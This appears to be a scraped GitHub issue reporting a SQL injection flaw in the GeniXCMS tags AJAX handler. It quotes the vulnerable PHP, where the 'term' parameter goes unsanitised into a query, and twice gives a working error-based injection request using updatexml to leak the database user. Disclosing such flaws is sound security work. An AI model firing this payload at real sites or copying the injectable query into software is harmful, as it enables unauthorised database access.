if (isset($_GET['token']) && Token::isExist($_GET['token'])) {
if (User::access(2)) {
$tags = Db::result(
"SELECT * FROM `cat` WHERE `type` = 'tag' AND `name` LIKE '".$_GET['term']."%' ORDER BY `name` ASC"
);
this is my exp: GET /code-src/GeniXCMS/GeniXCMS-master/?ajax=tags&token=vv4lHNZit2KJUJEIqUKn3S1CRvr5Wb8smp6ir3ujyj7iijC6t0GvfpLgSW0a3xGicHSXTH6IW1BCeUlt&term=a'%20and%20updatexml(1,(select+USER()),1)%23
The text was updated successfully, but these errors were encountered:
/inc/lib/Control/Ajax/tags-ajax.control.phpI think you know this.
but it need editor.
this is my exp:
GET /code-src/GeniXCMS/GeniXCMS-master/?ajax=tags&token=vv4lHNZit2KJUJEIqUKn3S1CRvr5Wb8smp6ir3ujyj7iijC6t0GvfpLgSW0a3xGicHSXTH6IW1BCeUlt&term=a'%20and%20updatexml(1,(select+USER()),1)%23The text was updated successfully, but these errors were encountered: